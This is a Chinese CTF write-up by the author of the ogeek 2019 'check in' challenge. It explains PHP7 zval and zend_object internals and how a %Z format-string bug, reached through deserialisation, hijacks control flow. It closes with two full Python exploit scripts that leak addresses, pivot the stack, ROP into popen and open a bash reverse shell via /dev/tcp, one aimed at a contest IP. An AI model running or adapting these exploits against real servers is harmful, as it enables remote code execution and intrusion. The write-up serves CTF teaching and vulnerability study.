---
# System prepended metadata

title: PHP pwn入门1 - 格式化字符串漏洞

---

# PHP pwn入门1 - 格式化字符串漏洞

PHP是一门不错的语言，它给予了开发者更多的便捷性。但作为一门解释型语言，而且加入了Zend虚拟机的机制，还有其独特的语法糖，使得其在每一次版本更迭后都有漏洞频频爆出。因为其使用的广泛性，研究PHP的漏洞利用方式是有一定价值的。这里笔者将以自己出的CTF题目为例，记录下自己学习PHP漏洞利用的过程(主要针对PHP7)。

## 了解PHP变量的基本结构

PHP的一个基本结构是zval，它所对应的变量类型由type这个字段标识。
```c
// /Zend/zend_types.h
struct _zval_struct {
	zend_value        value;			/* value */
	union {
		struct {
			ZEND_ENDIAN_LOHI_4(
				zend_uchar    type,			/* active type */
				zend_uchar    type_flags,
				zend_uchar    const_flags,
				zend_uchar    reserved)	    /* call info for EX(This) */
		} v;
		uint32_t type_info;
	} u1;
	union {
		uint32_t     next;                 /* hash collision chain */
		uint32_t     cache_slot;           /* literal cache slot */
		uint32_t     lineno;               /* line number (for ast nodes) */
		uint32_t     num_args;             /* arguments number for EX(This) */
		uint32_t     fe_pos;               /* foreach position */
		uint32_t     fe_iter_idx;          /* foreach iterator index */
		uint32_t     access_flags;         /* class constant access flags */
		uint32_t     property_guard;       /* single property guard */
		uint32_t     extra;                /* not further specified */
	} u2;
};

```


type的值对应的不同类型可以在`/Zend/zend_types.h`找到
```c
/* regular data types */
#define IS_UNDEF					0
#define IS_NULL						1
#define IS_FALSE					2
#define IS_TRUE						3
#define IS_LONG						4
#define IS_DOUBLE					5
#define IS_STRING					6
#define IS_ARRAY					7
#define IS_OBJECT					8
#define IS_RESOURCE					9
#define IS_REFERENCE				10

/* constant expressions */
#define IS_CONSTANT_AST				11

/* internal types */
#define IS_INDIRECT             	13
#define IS_PTR						14
#define _IS_ERROR					15

/* fake types used only for type hinting (Z_TYPE(zv) can not use them) */
#define _IS_BOOL					16
#define IS_CALLABLE					17
#define IS_ITERABLE					18
#define IS_VOID						19
#define _IS_NUMBER					20
```
除了type，另一个我们需要关注的就是value了，它指向了变量对应的实际数据结构体。

![](https://i.imgur.com/KTNHbAM.png)

比如zend_string和PHP漏洞利用经常用到的zend_object
```c
struct _zend_string {
	zend_refcounted_h gc;
	zend_ulong        h;                /* hash value */
	size_t            len;
	char              val[1];
};
```
```c
struct _zend_object {
	zend_refcounted_h gc;
	uint32_t          handle; // TODO: may be removed ???
	zend_class_entry *ce;
	const zend_object_handlers *handlers;
	HashTable        *properties;
	zval              properties_table[1];
};
```
我们可以发现，一个`zend_object`结构体中包含了`zend_object_handlers`部分

![](https://i.imgur.com/S5mq5E6.png)

这是一个函数列表，在对一个zend_object对象进行处理的时候（可以理解为对PHP的object结构进行一些操作），就会调用其中的函数。

![](https://i.imgur.com/E3nLBfP.png)

PHP的基本结构以及大部分数据基本都存储在PHP堆管理下的堆区域中(mmap)，使用emalloc和efree进行分配和释放。它的管理机制笔者暂时不在本篇提及。但是有个比较简单的规律: 分配并释放一块区域，下次再分配同样的大小又会被分配到该区域（其实这也是mmap的规律了）。

## PHP的格式化字符串

PHP的格式化字符串函数增加了一些有PHP特性的格式，比如`%Z`。这个会将对应参数指向的内容(PHP视作`zval`结构体的value)强制转换成`zend_string`输出。
```c 
// main/spprintf.c
switch (*fmt) {
	case 'Z': {
		zvp = (zval*) va_arg(ap, zval*);
		free_zcopy = zend_make_printable_zval(zvp, &zcopy);
		if (free_zcopy) {
			zvp = &zcopy;
		}
		s_len = Z_STRLEN_P(zvp);
		s = Z_STRVAL_P(zvp);
		if (adjust_precision && (size_t)precision < s_len) {
			s_len = precision;
		}
		break;
	}
```

```c
// Zend/zend.c
ZEND_API int zend_make_printable_zval(zval *expr, zval *expr_copy) /* {{{ */
{
	if (Z_TYPE_P(expr) == IS_STRING) {
		return 0;
	} else {
		ZVAL_STR(expr_copy, zval_get_string_func(expr));
		return 1;
	}
}
```
```c
ZEND_API zend_string* ZEND_FASTCALL _zval_get_string_func(zval *op) /* {{{ */

...

case IS_OBJECT: {
	zval tmp;
	if (Z_OBJ_HT_P(op)->cast_object) {
		if (Z_OBJ_HT_P(op)->cast_object(op, &tmp, IS_STRING) == SUCCESS) {
			return Z_STR(tmp);
		}
	} else if (Z_OBJ_HT_P(op)->get) {
		zval *z = Z_OBJ_HT_P(op)->get(op, &tmp);
		if (Z_TYPE_P(z) != IS_OBJECT) {
			zend_string *str = zval_get_string(z);
			zval_ptr_dtor(z);
			return str;
		}
		zval_ptr_dtor(z);
...
```
我们可以看到，如果指向的zval是一个object类型，就会调用其zend_object结构体中的handlers中的cast_object这个函数。

所以当触发格式化字符串漏洞的时候，我们只需要在内存中找到一个可控的地址，在其指向的部分填充一个fake zval(type部分填充`\x08`,value部分填充fake zend_object的地址)、fake zend_object(handlers填充fake handlers)和fake handlers(cast_object填充我们要执行指令的地址)，即可控制RIP。但是仅仅控制RIP在很多版本的PHP是不够的，因为RDI不可控，如果是远程攻击而非cli的话，跳到one_gadget就不行了，需要我们去找到一个合适的gadget进行栈迁移达成最终的利用（这里说的是PHP64位的利用）。

这里我以我在vivo 2019 ogeek挑战赛出的题目`check in`为例写一下具体的利用过程。

## ogeek check_in writeup

![](https://i.imgur.com/r8p7Eaj.png)
查看HTML源码发现有文件泄露
![](https://i.imgur.com/P8SXk78.png)
![](https://i.imgur.com/cNlQc1F.png)

发现整个题目的dockerfile和所需附件都给出来了。

逆向test.so和index.php，发现存在漏洞。
![](https://i.imgur.com/fRQ18p1.png)

![](https://i.imgur.com/30IreHO.png)

### 反序列化漏洞

`$this->index()` 从cookie中取出S，依次经过`urldecode`、`base64decode`、`f(rc4加密)`、`base64decode`，传入`php_var_unserialize`

![](https://i.imgur.com/TuqmvFg.png)

经过反序列化的类依次经过对`format`赋值、对`format_str`赋值、对`other`赋值的操作
然后将整个类作为返回值返回，再调用`$obj->render()`渲染

![](https://i.imgur.com/hOhzmNP.png)

format被强制赋值成`<h1> Wel ... %s ...`，format_str是从反序列化结果的`name`中提取的，other就是从反序列化结果的`other`中提取的。

![](https://i.imgur.com/qdKjdgI.png)



在函数render()里，format、format_str、other分别被传入render_s()中。

![](https://i.imgur.com/O9DGqoy.png)

format是作为格式被传入`zend_vspprintf`，剩下两个作为参数。

那么此题的关键在于控制format，在回想刚才format是被写死的，但是它的赋值是在对format_str和other赋值之前进行赋值的，我们可以将format_str通过reference指向format，这样当我们通过name修改format_str时，间接的也修改了format。
```php
$obj->format = &$obj->format_str;
```
从而造成格式化字符串漏洞。
### 格式化字符串漏洞

根据上面所说，我们先使用`%p`泄露libc和libphp的地址，然后控制rip，寻找gadget进行栈迁移。(因为other是第二个参数，且内容可控，所以可以将fake zval、object、handlers布置在上面)

控制RIP时寄存器的状态如下，我们需要跳到一个可以进行栈迁移的位置，将栈迁移至堆上我们可以控制的地方。在寻找gadget之前，我们先记录一下RCX是可控的。

![](https://i.imgur.com/3pa8ldb.png)

具体寻找gadget思路:

1. 对寄存器进行交换。
2. PUSH RCX;POP RSP;
3. ret 0x???;（这种需要将RAX清空，因为返回值不为0的话会跳到zend_error异常退出从而无法触发到第二次ret进行ROP）

![](https://i.imgur.com/Z7WfKTJ.png)

在出题之后，很凑巧在libphp中找到了第二点的gadget
![](https://i.imgur.com/TT8ZSGa.png)

但是比赛当天，我重新使用no-cache build docker的时候发现PHP有更新，这个gadget已经不存在了。

然后我又在libc找到一条可利用gadget, 总算让题目还是可以做。但是libc的地址泄露不是很稳定，需要在所有泄露的地址找以`aa`结尾的地址。
```
ROPgadget --binary /lib/x86_64-linux-gnu/libc-2.27.so --depth 30 |grep "push "|grep "pop rsp"

0x0000000000114334 : push qword ptr [rcx] ; rcr byte ptr [rbx + 0x5d], 0x41 ; pop rsp ; ret


```
### exp
#### 未更新前

```python
from pwn import *
import requests
from urllib import unquote,quote
import base64
import os
from binascii import unhexlify
key = '20190712'
def crypto(string):
    sbox = []
    for i in range(256):
        sbox.append(i)
    j = 0
    for i in range(256):
        j = (sbox[i] + j + ord(key[i%8]))%0x100
        sbox[i],sbox[j] = sbox[j],sbox[i]
    i1 = 0
    i2 = 0
    s = ''
    for i in range(len(string)):
        i1 = (i1 + 1)%0x100
        i2 = (i2 + sbox[i1])%0x100
        sbox[i1],sbox[i2] = sbox[i2],sbox[i1]
        s += chr(ord(string[i]) ^ sbox[(sbox[i1]+sbox[i2])%0x100])
    return s


command = "/bin/bash -c '/bin/bash -i >&/dev/tcp/xxxx/xxx 0>&1'\x00\x00"
target = "127.0.0.1"


burp0_url = "http://"+target+"/index.php?a=bbbbbbbbbbb%00cccccccc"
burp0_cookies = {"PHPSESSID": "769cb13v1vbmusfntcpqs3t3bl"}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", "Referer": "http://172.16.91.148/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data={"username": "admin", "password": ":admiN123:"}
#a = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
#print base64.b64decode(crypto(base64.b64decode(unquote(a.text.split("cookie='S=")[1].split("';location.hre")[0]))))
'''
a.php 

<?php
Class CppClass {
  var $name,$format,$format_str,$other;
}
if($argc<=2){
$obj = new \CppClass;
echo serialize($obj);
}
else
{
        $format = base64_decode($argv[1]);
        $exp = base64_decode($argv[2]);
        $obj = new \CppClass;
        $obj->name = $format;
        $obj->format = &$obj->format_str;
        $obj->other = $exp;
        echo base64_encode(serialize($obj));
}
?>

'''
def f(fmt,exp):
    try:
        b = os.popen("php a.php "+base64.b64encode(fmt)+" "+base64.b64encode(exp)).read()
        burp0_cookies["S"] = quote(base64.b64encode(crypto(b)))
        return requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies).text
    except:
        return 0


format_str = 'AAAAAAAA%p%p%p%p'
exp = "D"*24+"EEEEEEEE"*37
a = f(format_str,exp).replace("<!-- ./html.zip --!>",'')

heap_addr = a.split('0x')[2]
log.success("heap_addr: 0x"+heap_addr)

heap_addr = int('0x'+heap_addr,16)
lib_php_addr = a.split('0x')[4]
lib_php_addr = int('0x'+lib_php_addr,16)-0x2d0240
log.success("lib_php7.2.so base addr : "+hex(lib_php_addr))
magic_addr = lib_php_addr + 0x2e512b # push rcx; pop rsp; ret;
pop3_ret = lib_php_addr + 0xdbb57
pop_rsi = lib_php_addr + 0xdb427
pop_rdi = lib_php_addr + 0xdbb5c
call_popen = lib_php_addr + 0x1C6A71

'''
Generate fake *zval and *zend_object and *zend_object_handlers
Convert fake *zend_object to *zend_string (%Z)
https://github.com/php/php-src/blob/e6f86fb17cd3a2dfe94ca1a0113a23194cb1915a/main/spprintf.c#L401
https://github.com/php/php-src/blob/21b0f444296ac44eadc7ed3474fba5978ec8163d/Zend/zend.c#L356
https://github.com/php/php-src/blob/7f994990eab4ffc3eb8cddca413dc4bcd03e3457/Zend/zend_operators.c#L878
We can contol PC now.
Stack pivot (magic_addr) => ROP => popen(command,"r");
'''

format_str = "AAAAAAAA%p%Z%p%p"
exp = p64(heap_addr+0x10) # heap_addr
exp += p64(0x8)           # heap_addr+0x8
exp += p64(pop3_ret)      # heap_addr+0x10
exp += "AAAAAAAA"         # heap_addr+0x18
exp += "BBBBBBBB"         # heap_addr+0x20
exp += p64(heap_addr+0x30)
exp += p64(pop_rdi)
exp += p64(heap_addr+0xe8)
exp += p64(pop_rsi)
exp += p64(heap_addr+0xe0)
exp += p64(call_popen)
exp += "CCCCCCCC"*16
exp += p64(magic_addr)
exp += "r"+"\x00"*7
exp += command.ljust(80,'\x00')
exp += "AAAAAAAA"
a = f(format_str,exp)
log.success("exploit ok")
```
#### 更新后

```python
from pwn import *
import requests
from urllib import unquote,quote
import base64
import os
from binascii import unhexlify
key = '20190712'
def crypto(string):
    sbox = []
    for i in range(256):
        sbox.append(i)
    j = 0
    for i in range(256):
        j = (sbox[i] + j + ord(key[i%8]))%0x100
        sbox[i],sbox[j] = sbox[j],sbox[i]
    i1 = 0
    i2 = 0
    s = ''
    for i in range(len(string)):
        i1 = (i1 + 1)%0x100
        i2 = (i2 + sbox[i1])%0x100
        sbox[i1],sbox[i2] = sbox[i2],sbox[i1]
        s += chr(ord(string[i]) ^ sbox[(sbox[i1]+sbox[i2])%0x100])
    return s

command = "/bin/bash -c '/bin/bash -i >&/dev/tcp/xxx/xxx 0>&1'\x00"
burp0_url = "http://47.112.98.102:14141/index.php?a=bbbbbbbbbbb%00cccccccc"
burp0_cookies = {"PHPSESSID": "769cb13v1vbmusfntcpqs3t3bl"}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", "Referer": "http://172.16.91.148/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data={"username": "admin", "password": ":admiN123:"}
#a = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
#print base64.b64decode(crypto(base64.b64decode(unquote(a.text.split("cookie='S=")[1].split("';location.hre")[0]))))

def f(fmt,exp):
    try:
        b = os.popen("php a.php "+base64.b64encode(fmt)+" "+base64.b64encode(exp)).read()
        burp0_cookies["S"] = quote(base64.b64encode(crypto(b)))
        return requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
    except:
        return 0


format_str = 'AAAAAAAA'+"%p"*700
exp = "D"*24+"EEEEEEEE"*37
a = f(format_str,exp).text.replace("<!-- ./html.zip --!>",'')
#print a

heap_addr = a.split('0x')[2]
log.success("heap_addr: 0x"+heap_addr)

heap_addr = int('0x'+heap_addr,16)
lib_php_addr = a.split('0x')[4]
lib_php_addr = int('0x'+lib_php_addr,16)-0x2d0240-0x3c0
log.success("lib_php7.2.so base addr : "+hex(lib_php_addr))
libc_addr = a.split('0x')
libc_addr = libc_addr[-1] # libc addr end with 'aa', you need to adjust the index according to the actual situation.
libc_addr = int("0x"+libc_addr,16)-0x5b9aa
log.success('libc_addr: ' + hex(libc_addr))
magic_addr = libc_addr + 0x114334 #push [rcx];...;pop rsp;
log.success('magic_addr: ' + hex(magic_addr))
pop_ret = lib_php_addr + 0xdb427
pop_rsi = lib_php_addr + 0xdb427
pop_rdi = lib_php_addr + 0xdbb5c
call_popen = libc_addr + 0x80930

format_str = "AAAAAAAA%p%Z%p%p"+"%p"*(700-4)
exp = p64(heap_addr+0x10) # heap_addr  (rbx)
exp += p64(0x8)           # heap_addr+0x8
exp += p64(heap_addr+0x20)# heap_addr+0x10 (rcx)
exp += "AAAAAAAA"         # heap_addr+0x18
exp += p64(pop_ret)       # heap_addr+0x20
exp += p64(heap_addr+0x30)
exp += p64(pop_rdi)
exp += p64(heap_addr+0xe8)
exp += p64(pop_rsi)
exp += p64(heap_addr+0xe0)
exp += p64(call_popen)
exp += "CCCCCCCC"*16
exp += p64(magic_addr)
exp += "r"+"\x00"*7
exp += command.ljust(80,'\x00')
exp += "AAAAAAAA"
a = f(format_str,exp)
log.success("exploit ok")

```